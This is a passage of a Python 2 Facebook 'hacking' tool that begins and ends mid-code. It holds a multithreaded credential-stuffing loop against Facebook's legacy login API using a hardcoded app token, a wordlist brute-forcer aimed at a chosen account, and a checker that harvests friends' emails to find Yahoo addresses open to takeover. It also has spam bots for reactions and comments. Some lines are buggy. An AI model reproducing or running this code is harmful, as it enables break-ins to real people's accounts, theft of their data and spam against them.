if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print("\033[1;97m[ \033[1;92mOK✓\033[1;97m ] "+user+ " Password " +pass4+" =>"+z['name'])
oks.append(user+pass4)
else:
if 'www.facebook.com' in q["error_msg"]:
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass4+"\n")
cek.close()
cekpoint.append(user+pass4)
else:
#Pass5
pass5 = "sayang123"
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass5)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print("\033[1;97m[ \033[1;92mOK✓\033[1;97m ] "+user+ " Password " +pass5+" =>"+z['name'])
oks.append(user+pass5)
else:
if 'www.facebook.com' in q["error_msg"]:
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass5+"\n")
cek.close()
cekpoint.append(user+pass5)
else:
#Pass6
pass6 = "kontol123"
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass6)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print("\033[1;97m[ \033[1;92mOK✓\033[1;97m ] "+user+ " Password " +pass6+" =>"+z['name'])
oks.append(user+pass6)
else:
if 'www.facebook.com' in q["error_msg"]:
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass6+"\n")
cek.close()
cekpoint.append(user+pass6)
else:
#Pass7
a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
b = json.loads(a.text)
pass8 = b['first_name']+'doraemon12345'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass7)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print("\033[1;97m[ \033[1;92mOK✓\033[1;97m ] "+user+ " Password " +pass7+" =>"+['name'])
oks.append(user+pass7)
else:
if 'www.facebook.com' in q["error_msg"]:
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass7+"\n")
cek.close()
cekpoint.append(user+pass7)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print 42*"\033[1;97m═"
print '\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mDone \033[1;97m....'
print"\033[1;91m[+] \033[1;92mTotal OK/CP \033[1;91m: \033[1;92m"+str(len(oks))+"\033[1;97m/\033[1;93m"+str(len(cekpoint))
print("\033[1;91m[+] \033[1;92mCP File saved \033[1;91m: \033[1;97mout/super_cp.txt")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
super()
######################################################
##### BRUTE FORCE #####
def brute():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
try:
email = raw_input("\033[1;91m[+] \033[1;92mID\033[1;97m/\033[1;92mEmail\033[1;97m/\033[1;92mHp \033[1;97mTarget \033[1;91m:\033[1;97m ")
passw = raw_input("\033[1;91m[+] \033[1;92mWordlist \033[1;97mext(list.txt) \033[1;91m: \033[1;97m")
total = open(passw,"r")
total = total.readlines()
print 42*"\033[1;97m═"
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mTarget \033[1;91m:\033[1;97m "+email
print "\033[1;91m[+] \033[1;92mTotal\033[1;96m "+str(len(total))+" \033[1;92mPassword"
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
sandi = open(passw,"r")
for pw in sandi:
try:
pw = pw.replace("\n","")
sys.stdout.write("\r\033[1;91m[\033[1;96m✸\033[1;91m] \033[1;92mCrack \033[1;91m: \033[1;97m"+pw)
sys.stdout.flush()
data = requests.get("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(email)+"&locale=en_US&password="+(pw)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
dapat = open("Brute.txt", "w")
dapat.write(email+" | "+pw+"\n")
dapat.close()
print "\n\033[1;91m[+] \033[1;92mFound"
print 42*"\033[1;97m═"
print("\033[1;91m[➹] \033[1;92mUsername \033[1;91m:\033[1;97m "+email)
print("\033[1;91m[➹] \033[1;92mPassword \033[1;91m:\033[1;97m "+pw)
keluar()
elif 'www.facebook.com' in mpsh["error_msg"]:
ceks = open("Brutecekpoint.txt", "w")
ceks.write(email+" | "+pw+"\n")
ceks.close()
print "\n\033[1;91m[+] \033[1;92mFound"
print 42*"\033[1;97m═"
print "\033[1;91m[!] \033[1;93mAccount Checkpoint"
print("\033[1;91m[➹] \033[1;92mUsername \033[1;91m:\033[1;97m "+email)
print("\033[1;91m[➹] \033[1;92mPassword \033[1;91m:\033[1;97m "+pw)
keluar()
except requests.exceptions.ConnectionError:
print"\033[1;91m[!] Connection Error"
time.sleep(1)
except IOError:
print ("\033[1;91m[!] File not found")
tanyaw()
def tanyaw():
why = raw_input("\033[1;91m[?] \033[1;92mCreate wordlist ? \033[1;92m[y/n]\033[1;91m:\033[1;97m ")
if why =="":
print "\033[1;91m[!] Wrong"
tanyaw()
elif why =="y":
wordlist()
elif why =="Y":
wordlist()
elif why =="n":
menu_hack()
elif why =="N":
menu_hack()
else:
print "\033[1;91m[!] Wrong"
tanyaw()
##### YAHOO CHECKER #####
#---------------------------------------------------#
def menu_yahoo():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;97m║--\033[1;91m> \033[1;92m1.\033[1;97m With list friend"
print "\033[1;97m║--\033[1;91m> \033[1;92m2.\033[1;97m Clone from friend"
print "\033[1;97m║--\033[1;91m> \033[1;92m3.\033[1;97m Clone from member group"
print "\033[1;97m║--\033[1;91m> \033[1;92m4.\033[1;97m Using file"
print "\033[1;97m║--\033[1;91m> \033[1;91m0.\033[1;97m Back"
print "║"
yahoo_pilih()
#----pilih
def yahoo_pilih():
go = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if go =="":
print "\033[1;91m[!] Wrong"
yahoo_pilih()
elif go =="1":
yahoofriends()
elif go =="2":
yahoofromfriends()
elif go =="3":
yahoomember()
elif go =="4":
yahoolist()
elif go =="0":
menu_hack()
else:
print "\033[1;91m[!] Wrong"
yahoo_pilih()
##### LIST FRIEND #####
def yahoofriends():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
os.system('reset')
print logo
mpsh = []
jml = 0
jalan('\033[1;91m[✺] \033[1;92mGetting email friend \033[1;97m...')
teman = requests.get('https://graph.facebook.com/me/friends?access_token='+toket)
kimak = json.loads(teman.text)
save = open('out/MailVuln.txt','w')
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for w in kimak['data']:
jml +=1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get("https://graph.facebook.com/"+id+"?access_token="+toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["username"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print("\033[1;97m[ \033[1;92mVULN✓\033[1;97m ] \033[1;92m" +mail+" \033[1;97m=>"+nama)
berhasil.append(mail)
except KeyError:
pass
print 42*"\033[1;97m═"
print '\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mDone \033[1;97m....'
print"\033[1;91m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
print"\033[1;91m[+] \033[1;92mFile saved \033[1;91m:\033[1;97m out/MailVuln.txt"
save.close()
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_yahoo()
##### CLONE FROM FRIEND #####
def yahoofromfriends():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
os.system('reset')
print logo
mpsh = []
jml = 0
idt = raw_input("\033[1;91m[+] \033[1;92mInput ID friend \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;91m[!] Friend not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_yahoo()
jalan('\033[1;91m[✺] \033[1;92mGetting email from friend \033[1;97m...')
teman = requests.get('https://graph.facebook.com/'+idt+'/friends?access_token='+toket)
kimak = json.loads(teman.text)
save = open('out/FriendMailVuln.txt','w')
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for w in kimak['data']:
jml +=1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get("https://graph.facebook.com/"+id+"?access_token="+toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["username"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print("\033[1;97m[ \033[1;92mVULN✓\033[1;97m ] \033[1;92m" +mail+" \033[1;97m=>"+nama)
berhasil.append(mail)
except KeyError:
pass
print 42*"\033[1;97m═"
print '\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mDone \033[1;97m....'
print"\033[1;91m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
print"\033[1;91m[+] \033[1;92mFile saved \033[1;91m:\033[1;97m out/FriendMailVuln.txt"
save.close()
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_yahoo()
##### YAHOO MEMBER #####
def yahoomember():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
os.system('reset')
print logo
mpsh = []
jml = 0
id=raw_input('\033[1;91m[+] \033[1;92mInput ID group \033[1;91m:\033[1;97m ')
try:
r=requests.get('https://graph.facebook.com/group/?id='+id+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;91m[!] Group not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_yahoo()
jalan('\033[1;91m[✺] \033[1;92mGetting email from group \033[1;97m...')
teman = requests.get('https://graph.facebook.com/'+id+'/members?fields=name,id&limit=999999999&access_token='+toket)
kimak = json.loads(teman.text)
save = open('out/GrupMailVuln.txt','w')
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for w in kimak['data']:
jml +=1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get("https://graph.facebook.com/"+id+"?access_token="+toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["username"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print("\033[1;97m[ \033[1;92mVULN✓\033[1;97m ] \033[1;92m" +mail+" \033[1;97m=>"+nama)
berhasil.append(mail)
except KeyError:
pass
print 42*"\033[1;97m═"
print '\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mDone \033[1;97m....'
print"\033[1;91m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
print"\033[1;91m[+] \033[1;92mFile saved \033[1;91m:\033[1;97m out/GrupMailVuln.txt"
save.close()
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_yahoo()
##### YAHOO FILE #####
def yahoolist():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
os.system('reset')
print logo
files = raw_input("\033[1;91m[+] \033[1;92mFile path \033[1;91m: \033[1;97m")
try:
total = open(files,"r")
mail = total.readlines()
except IOError:
print"\033[1;91m[!] File not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_yahoo()
mpsh = []
jml = 0
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
save = open('out/FileMailVuln.txt','w')
print 42*"\033[1;97m═"
mail = open(files,"r").readlines()
for pw in mail:
mail = pw.replace("\n","")
jml +=1
mpsh.append(jml)
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["username"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print("\033[1;97m[ \033[1;92mVULN✓\033[1;97m ] \033[1;92m" +mail)
berhasil.append(mail)
print 42*"\033[1;97m═"
print '\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mDone \033[1;97m....'
print"\033[1;91m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
print"\033[1;91m[+] \033[1;92mFile saved \033[1;91m:\033[1;97m out/FileMailVuln.txt"
save.close()
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_yahoo()
##### MENU BOT #####
#----------------------------------------#
def menu_bot():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;97m║--\033[1;91m> \033[1;92m1.\033[1;97m Bot Reactions Target Post"
print "\033[1;97m║--\033[1;91m> \033[1;92m2.\033[1;97m Bot Reactions Grup Post"
print "\033[1;97m║--\033[1;91m> \033[1;92m3.\033[1;97m Bot Komen Target Post"
print "\033[1;97m║--\033[1;91m> \033[1;92m4.\033[1;97m Bot Komen Grup Post"
print "\033[1;97m║--\033[1;91m> \033[1;92m5.\033[1;97m Mass delete Post"
print "\033[1;97m║--\033[1;91m> \033[1;92m6.\033[1;97m Mass accept friend"
print "\033[1;97m║--\033[1;91m> \033[1;92m7.\033[1;97m Mass delete friend"
print "\033[1;97m║--\033[1;91m> \033[1;91m0.\033[1;97m Back"
print "║"
bot_pilih()
#////////////
def bot_pilih():
bots = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if bots =="":
print "\033[1;91m[!] Wrong input"
bot_pilih()
elif bots =="1":
menu_react()
elif bots =="2":
grup_react()
elif bots =="3":
bot_komen()
elif bots =="4":
grup_komen()
elif bots =="5":
deletepost()
elif bots =="6":
accept()
elif bots =="7":
unfriend()
elif bots =="0":
menu()
else:
print "\033[1;91m[!] Wrong input"
bot_pilih()
##### MENU REACT #####
def menu_react():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print ("\033[1;97m║--\033[1;91m> \033[1;92m1. \033[1;97mLike")
print ("\033[1;97m║--\033[1;91m> \033[1;92m2. \033[1;97mLove")
print ("\033[1;97m║--\033[1;91m> \033[1;92m3. \033[1;97mWow")
print ("\033[1;97m║--\033[1;91m> \033[1;92m4. \033[1;97mHaha")
print ("\033[1;97m║--\033[1;91m> \033[1;92m5. \033[1;97mSadBoy")
print ("\033[1;97m║--\033[1;91m> \033[1;92m6. \033[1;97mAngry")
print "\033[1;97m║--\033[1;91m> \033[1;91m0.\033[1;97m Back"
print "║"
react_pilih()
#//////////////
def react_pilih():
global tipe
aksi = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if aksi =="":
print "\033[1;91m[!] Wrong input"
react_pilih()
elif aksi =="1":
tipe = "LIKE"
react()
elif aksi =="2":
tipe = "LOVE"
react()
elif aksi =="3":
tipe = "WOW"
react()
elif aksi =="4":
tipe = "HAHA"
react()
elif aksi =="5":
tipe = "SAD"
react()
elif aksi =="6":
tipe = "ANGRY"
react()
elif aksi =="0":
menu_bot()
else:
print "\033[1;91m[!] Wrong input"
react_pilih()
#####NEXT
def react():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
ide = raw_input('\033[1;91m[+] \033[1;92mInput ID Target \033[1;91m:\033[1;97m ')
limit = raw_input("\033[1;91m[!] \033[1;92mLimit \033[1;91m:\033[1;97m ")
try:
oh = requests.get("https://graph.facebook.com/"+ide+"?fields=feed.limit("+limit+")&access_token="+toket)
ah = json.loads(oh.text)
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for a in ah['feed']['data']:
y = a['id']
reaksi.append(y)
requests.post("https://graph.facebook.com/"+y+"/reactions?type="+tipe+"&access_token="+toket)
print '\033[1;92m[\033[1;97m'+y[:10].replace('\n',' ')+'... \033[1;92m] \033[1;97m'+tipe
print 42*"\033[1;97m═"
print "\r\033[1;91m[+]\033[1;92m Done \033[1;97m"+str(len(reaksi))
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
except KeyError:
print"\033[1;91m[!] ID not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
##### BOT REACT GRUP #####
def grup_react():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print ("\033[1;97m║--\033[1;91m> \033[1;92m1. \033[1;97mLike")
print ("\033[1;97m║--\033[1;91m> \033[1;92m2. \033[1;97mLove")
print ("\033[1;97m║--\033[1;91m> \033[1;92m3. \033[1;97mWow")
print ("\033[1;97m║--\033[1;91m> \033[1;92m4. \033[1;97mHaha")
print ("\033[1;97m║--\033[1;91m> \033[1;92m5. \033[1;97mSadBoy")
print ("\033[1;97m║--\033[1;91m> \033[1;92m6. \033[1;97mAngry")
print "\033[1;97m║--\033[1;91m> \033[1;91m0.\033[1;97m Back"
print "║"
reactg_pilih()
#//////////////
def reactg_pilih():
global tipe
aksi = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if aksi =="":
print "\033[1;91m[!] Wrong input"
reactg_pilih()
elif aksi =="1":
tipe = "LIKE"
reactg()
elif aksi =="2":
tipe = "LOVE"
reactg()
elif aksi =="3":
tipe = "WOW"
reactg()
elif aksi =="4":
tipe = "HAHA"
reactg()
elif aksi =="5":
tipe = "SAD"
reactg()
elif aksi =="6":
tipe = "ANGRY"
reactg()
elif aksi =="0":
menu_bot()
else:
print "\033[1;91m[!] Wrong input"
reactg_pilih()
#####NEXT
def reactg():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
ide = raw_input('\033[1;91m[+] \033[1;92mInput ID Group \033[1;91m:\033[1;97m ')
limit = raw_input("\033[1;91m[!] \033[1;92mLimit \033[1;91m:\033[1;97m ")
try:
r=requests.get('https://graph.facebook.com/group/?id='+ide+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;91m[!] Group not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
grup_react()
try:
oh = requests.get("https://graph.facebook.com/v3.0/"+ide+"?fields=feed.limit("+limit+")&access_token="+toket)
ah = json.loads(oh.text)
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for a in ah['feed']['data']:
y = a['id']
reaksigrup.append(y)
requests.post("https://graph.facebook.com/"+y+"/reactions?type="+tipe+"&access_token="+toket)
print '\033[1;92m[\033[1;97m'+y[:10].replace('\n',' ')+'... \033[1;92m] \033[1;97m'+tipe
print 42*"\033[1;97m═"
print "\r\033[1;91m[+]\033[1;92m Done \033[1;97m"+str(len(reaksigrup))
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
except KeyError:
print"\033[1;91m[!] ID not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
##### BOT KOMEN #####
def bot_komen():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;91m[!] \033[1;92mUse \033[1;97m'<>' \033[1;92mfor new lines"
ide = raw_input('\033[1;91m[+] \033[1;92mID Target \033[1;91m:\033[1;97m ')
km = raw_input('\033[1;91m[+] \033[1;92mComment \033[1;91m:\033[1;97m ')
limit = raw_input("\033[1;91m[!] \033[1;92mLimit \033[1;91m:\033[1;97m ")
km=km.replace('<>','\n')
try:
p = requests.get("https://graph.facebook.com/"+ide+"?fields=feed.limit("+limit+")&access_token="+toket)
a = json.loads(p.text)
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for s in a['feed']['data']:
f = s['id']
komen.append(f)
requests.post("https://graph.facebook.com/"+f+"/comments?message="+km+"&access_token="+toket)
print '\033[1;92m[\033[1;97m'+km[:10].replace('\n',' ')+'... \033[1;92m]'
print 42*"\033[1;97m═"
print "\r\033[1;91m[+]\033[1;92m Done \033[1;97m"+str(len(komen))
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
except KeyError:
print"\033[1;91m[!] ID not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
##### BOT KOMEN GRUP #####
def grup_komen():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;91m[!] \033[1;92mUse \033[1;97m'<>' \033[1;92mfor new lines"
ide = raw_input('\033[1;91m[+] \033[1;92mID Group \033[1;91m:\033[1;97m ')
km = raw_input('\033[1;91m[+] \033[1;92mComment \033[1;91m:\033[1;97m ')
limit = raw_input("\033[1;91m[!] \033[1;92mLimit \033[1;91m:\033[1;97m ")
km=km.replace('<>','\n')
try:
r=requests.get('https://graph.facebook.com/group/?id='+ide+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;91m[!] Group not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
try:
p = requests.get("https://graph.facebook.com/v3.0/"+ide+"?fields=feed.limit("+limit+")&access_token="+toket)
a = json.loads(p.text)
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for s in a['feed']['data']:
f = s['id']
komengrup.append(f)
requests.post("https://graph.facebook.com/"+f+"/comments?message="+km+"&access_token="+toket)
print '\033[1;92m[\033[1;97m'+km[:10].replace('\n',' ')+'... \033[1;92m]'
print 42*"\033[1;97m═"
print "\r\033[1;91m[+]\033[1;92m Done \033[1;97m"+str(len(komengrup))
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
except KeyError:
print"\033[1;91m[!] Error"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
##### HAPUS POST #####
def deletepost():
os.system('reset')
try:
toket=open('login.txt','r').read()
nam = requests.get('https://graph.facebook.com/me?access_token='+toket)
lol = json.loads(nam.text)
nama = lol['name']
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print("\033[1;91m[+] \033[1;92mFrom \033[1;91m: \033[1;97m%s"%nama)
jalan("\033[1;91m[+] \033[1;92mStart\033[1;97m ...")
print 42*"\033[1;97m═"
asu = requests.get('https://graph.facebook.com/me/feed?access_token='+toket)
asus = json.loads(asu.text)
for p in asus['data']:
id = p['id']
piro = 0
url = requests.get('https://graph.facebook.com/'+id+'?method=delete&access_token='+toket)
ok = json.loads(url.text)
try:
error = ok['error']['message']
print '\033[1;91m[\033[1;97m'+id[:10].replace('\n',' ')+'...'+'\033[1;91m] \033[1;95mFailed'
except TypeError:
print '\033[1;92m[\033[1;97m'+id[:10].replace('\n',' ')+'...'+'\033[1;92m] \033[1;96mDeleted'
piro += 1
except requests.exceptions.ConnectionError:
print"\033[1;91m[!] Connection Error"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
print 42*"\033[1;97m═"
print"\033[1;91m[+] \033[1;92mDone"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
##### ACCEPT FRIEND #####
def accept():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
limit = raw_input("\033[1;91m[!] \033[1;92mLimit \033[1;91m:\033[1;97m ")
r = requests.get('https://graph.facebook.com/me/friendrequests?limit='+limit+'&access_token='+toket)
teman = json.loads(r.text)
if '[]' in str(teman['data']):
print"\033[1;91m[!] No friend request"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for i in teman['data']:
gas = requests.post('https://graph.facebook.com/me/friends/'+i['from']['id']+'?access_token='+toket)
a = json.loads(gas.text)
if 'error' in str(a):
print "\033[1;97m[ \033[1;91mFailed\033[1;97m ] "+i['from']['name']
else:
print "\033[1;97m[ \033[1;92mAccept\033[1;97m ] "+i['from']['name']
print 42*"\033[1;97m═"
print"\033[1;91m[+] \033[1;92mDone"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
##### UNFRIEND ####
def unfriend():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print "\033[1;97mStop \033[1;91mCTRL+C"
print 42*"\033[1;97m═"
try:
pek = requests.get('https://graph.facebook.com/me/friends?access_token='+toket)
cok = json.loads(pek.text)
for i in cok['data']:
nama = i['name']
id = i['id']
requests.delete("https://graph.facebook.com/me/friends?uid="+id+"&access_token="+toket)
print "\033[1;97m[\033[1;92m Deleted \033[1;97m] "+nama
except IndexError: pass
except KeyboardInterrupt:
print "\033[1;91m[!] Stopped"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
print"\n\033[1;91m[+] \033[1;92mDone"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
#### LAIN LAIN #####
# #
####MENU LAIN#####
def lain():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;97m║--\033[1;91m> \033[1;92m1.\033[1;97m Create Post"
print "\033[1;97m║--\033[1;91m> \033[1;92m2.\033[1;97m Create Wordlist"
print "\033[1;97m║--\033[1;91m> \033[1;92m3.\033[1;97m Account Checker"
